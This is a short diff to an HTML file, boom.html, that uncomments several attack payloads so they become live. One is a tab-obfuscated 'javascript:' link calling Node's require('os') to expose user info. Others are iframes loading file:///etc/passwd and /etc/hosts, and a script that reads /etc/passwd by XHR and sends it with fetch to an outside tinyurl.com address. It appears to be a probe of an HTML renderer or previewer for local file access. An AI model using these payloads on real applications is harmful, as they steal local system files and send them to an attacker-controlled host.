--- a/boom.html
+++ b/boom.html
@@ -1,12 +1,12 @@
 <a href="java&Tab;script:alert(JSON.stringify(require('os').userInfo()))">UserInfo</a>123
-<!-- <iframe 
+<iframe 
   src="file:///etc/passwd" 
   width="100%" 
   height="600px" 
   style="border:1px solid black;">
 </iframe> -->
 
-<!-- <!DOCTYPE html>
+<!DOCTYPE html>
 <body>
   <iframe src="file:///etc/hosts" style="display:none"></iframe>
   <script>
@@ -23,9 +23,9 @@
     xhr.send();
   </script>
 </body>
-</html> -->
+</html>
 
-<!-- <!DOCTYPE html>
+<!DOCTYPE html>
 <body>
   <iframe src="file:///etc/passwd" style="display:none"></iframe>
   <script>
@@ -40,8 +40,8 @@
     xhr.open('GET', 'file:///etc/passwd', true);
     xhr.onload = () => fetch('https://tinyurl.com/vvh5tkem/xhr', { body: xhr.responseText });
     xhr.send();
-  </script> -->
-<!-- </body>
-</html> -->
+  </script>
+</body>
+</html>
 
 
